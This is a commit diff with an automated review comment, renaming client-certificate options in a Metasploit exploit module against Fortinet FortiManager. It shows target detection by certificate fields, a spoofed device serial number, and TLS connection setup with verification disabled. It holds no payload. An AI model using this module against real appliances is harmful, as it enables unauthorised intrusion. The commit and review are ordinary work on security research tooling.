rename SSLClientCert and SSLClientKey to ClientCert and ClientKey. This then matches up with ClientSerialNumber and ClientPlatform, which is clearer IMHO. Also, we explicitly create a Rex TCP socket, so these param names no longer collide with what a mixin would use.

sfewer-r7
2024-11-15 09:44:50 +00:00
parent 6eb15d5b66
commit c3bd4792ec
@@ -70,9 +70,9 @@ class MetasploitModule < Msf::Exploit::Remote
register_options(
[
OptString.new('SSLClientCert', [true, 'A file path to an x509 cert, signed by Fortinet, with a serial number in the CN', nil]),
OptString.new('SSLClientKey', [true, 'A file path to the corresponding private key for the SSLClientCert.', nil]),
OptString.new('ClientSerialNumber', [false, 'If set, use this serial number instead of extracting one from the SSLClientCert.', nil]),
OptString.new('ClientCert', [true, 'A file path to an x509 cert, signed by Fortinet, with a serial number in the CN', nil]),
OptString.new('ClientKey', [true, 'A file path to the corresponding private key for the ClientCert.', nil]),
OptString.new('ClientSerialNumber', [false, 'If set, use this serial number instead of extracting one from the ClientCert.', nil]),
OptString.new('ClientPlatform', [false, 'If set, use this platform instead of determining the platform at runtime.', nil])
]
)
@@ -92,13 +92,13 @@ class MetasploitModule < Msf::Exploit::Remote
# Detect that the target is a Fortinet FortiManager, by inspecting the certificate the server is using.
# We look for an organization (O) of 'Fortinet', and a common name (CN) that starts with a FortiManager serial
# number identifier.
return CheckCode::Detected if organization == 'Fortinet' && common_name&.start_with?('FMG-')
return CheckCode::Detected if organization == 'Fortinet' && common_name&.start_with?('FMG')
CheckCode::Unknown
end
def exploit
client_cert_raw = File.read(datastore['SSLClientCert'])
client_cert_raw = File.read(datastore['ClientCert'])
client_cert = OpenSSL::X509::Certificate.new(client_cert_raw)
@@ -109,7 +109,7 @@ class MetasploitModule < Msf::Exploit::Remote
serial_number = 'FMG-VMTM24011111'
platform = 'FortiManager-VM64'
if common_name.start_with?('FMG-')
if common_name.start_with?('FMG')
serial_number = common_name
platform = 'FortiManager-VM64'
elsif common_name.start_with?('FG')
@@ -174,8 +174,8 @@ class MetasploitModule < Msf::Exploit::Remote
'PeerPort' => datastore['RPORT'],
'SSL' => true,
'SSLVerifyMode' => 'NONE',
'SSLClientCert' => datastore['SSLClientCert'],
'SSLClientKey' => datastore['SSLClientKey'],
'SSLClientCert' => datastore['ClientCert'],
'SSLClientKey' => datastore['ClientKey'],
'Context' =>
{
'Msf' => framework,
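Review bot: `ClientCert` and `ClientKey` are described as file paths in the `register_options` hunk but are still registered as `OptString`, so a wrong or missing path is only discovered later, at `File.read(datastore['ClientCert'])` in `exploit`, as a raw exception. Registering them as `OptPath.new('ClientCert', [true, '...'])` and `OptPath.new('ClientKey', [true, '...'])` would let the framework reject a non-existent file during option validation. Separately, the prefix test in both `check` and `exploit` is loosened from `'FMG-'` to `'FMG'`, which the commit message does not mention. If the reason is that some serial numbers in the CN carry no hyphen, a comment such as `# Some FortiManager serials have no hyphen after the FMG prefix` next to each test would record it. The `exploit` body continues outside these hunks, so error handling there may already cover part of the first point.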